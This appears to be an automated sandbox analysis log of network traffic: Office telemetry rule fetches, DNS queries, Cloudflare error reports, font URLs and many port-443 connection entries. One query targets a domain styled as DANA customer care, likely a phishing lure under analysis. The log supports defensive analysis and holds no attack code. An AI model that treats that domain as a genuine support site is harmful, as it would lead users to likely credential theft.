Source: global trafficHTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficDNS traffic detected: DNS query: bantuan-customer-care-dana.officio.asia
Source: global trafficDNS traffic detected: DNS query: code.jquery.com
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
Source: unknownHTTP traffic detected: POST /report/v4?s=UtFLnxrOceNUiReWd6AcFsKKBanqik7vlhUq5B1TiqpKFuzj4lGM5NHydcUVTFMHDNe9MiGScqtlkhyz4afCyYZ%2FVKpKfLUmcqGEPHMB5RHsSLMH8ngyojw3ktWGquAONjrZupqAwoAfG%2F8FXMX6UQT4WPaNezwP6kQ%3D HTTP/1.1Host: a.nel.cloudflare.comConnection: keep-aliveContent-Length: 470Content-Type: application/reports+jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 13 Oct 2024 17:33:31 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400CF-Cache-Status: EXPIREDReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UtFLnxrOceNUiReWd6AcFsKKBanqik7vlhUq5B1TiqpKFuzj4lGM5NHydcUVTFMHDNe9MiGScqtlkhyz4afCyYZ%2FVKpKfLUmcqGEPHMB5RHsSLMH8ngyojw3ktWGquAONjrZupqAwoAfG%2F8FXMX6UQT4WPaNezwP6kQ%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Speculation-Rules: "/cdn-cgi/speculation"Server: cloudflareCF-RAY: 8d21133b2d7942df-EWRalt-svc: h3=":443"; ma=86400
Source: chromecache_76.2.drString found in binary or memory: https://fonts.googleapis.com/css2?family=Open
Source: chromecache_50.2.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTS-muw.woff2)
Source: chromecache_50.2.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTS2mu1aB.woff2)
Source: chromecache_50.2.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTSCmu1aB.woff2)
Source: chromecache_50.2.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTSGmu1aB.woff2)
Source: chromecache_50.2.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTSKmu1aB.woff2)
Source: chromecache_50.2.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTSOmu1aB.woff2)
Source: chromecache_50.2.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTSumu1aB.woff2)
Source: chromecache_50.2.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTSymu1aB.woff2)
Source: chromecache_50.2.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTUGmu1aB.woff2)
Source: chromecache_50.2.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTVOmu1aB.woff2)
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49943 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49963
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49961
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49960
Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49959
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49957
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49956
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49955
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49952
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49951
Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49955 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49947
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
Source: unknownNetwork traffic detected: HTTP traffic on port 49945 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49957 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49963 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
